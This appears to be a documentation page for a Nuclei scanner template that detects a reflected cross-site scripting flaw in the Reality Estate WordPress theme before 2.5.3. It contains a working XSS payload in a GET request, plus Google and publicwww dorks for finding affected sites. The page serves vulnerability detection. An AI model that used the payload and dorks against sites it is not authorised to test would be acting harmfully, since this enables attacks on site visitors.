Reality Estate Multipurpose WP-Theme < 2.5.3 - Cross-Site Scripting
ID: wp-reality-estate-theme
Severity: medium
Author: r3Y3r53
Tags: wpscan,xss,wordpress,wp,wp-theme,reality,estate
Description
Section titled “Description”Reflected XSS was discovered in the ‘Reality | Estate Multipurpose WordPress Theme’.
YAML Source
Section titled “YAML Source”id: wp-reality-estate-theme
info: name: Reality Estate Multipurpose WP-Theme < 2.5.3 - Cross-Site Scripting author: r3Y3r53 severity: medium description: | Reflected XSS was discovered in the 'Reality | Estate Multipurpose WordPress Theme'. remediation: update to v.2.5.3 reference: - https://wpscan.com/vulnerability/10064 - https://www.exploitalert.com/view-details.html?id=34777 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cwe-id: CWE-79 metadata: verified: true max-request: 1 publicwww-query: /wp-content/themes/reality/ google-query: inurl:"/wp-content/themes/reality/" tags: wpscan,xss,wordpress,wp,wp-theme,reality,estate
http: - method: GET path: - "{{BaseURL}}/properties-with-map/?status&keyword=%22%3E%3Cimg%20src=x%20onerror=(alert)(document.domain);//%22"
matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(content_type, "text/html")' - 'contains_all(body, "reality", "estate", "><img src=x onerror=(alert)(document.domain)")' condition: and# digest: 4b0a00483046022100f2d70546d0883753193578e2622f6dd4fb1efaf30faab4681ee77c77981feee4022100c46984edb9235062da04edeadcd05e2321d2062ce9893cc60be5dce141a54907:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/wordpress/wp-reality-estate-theme.yaml"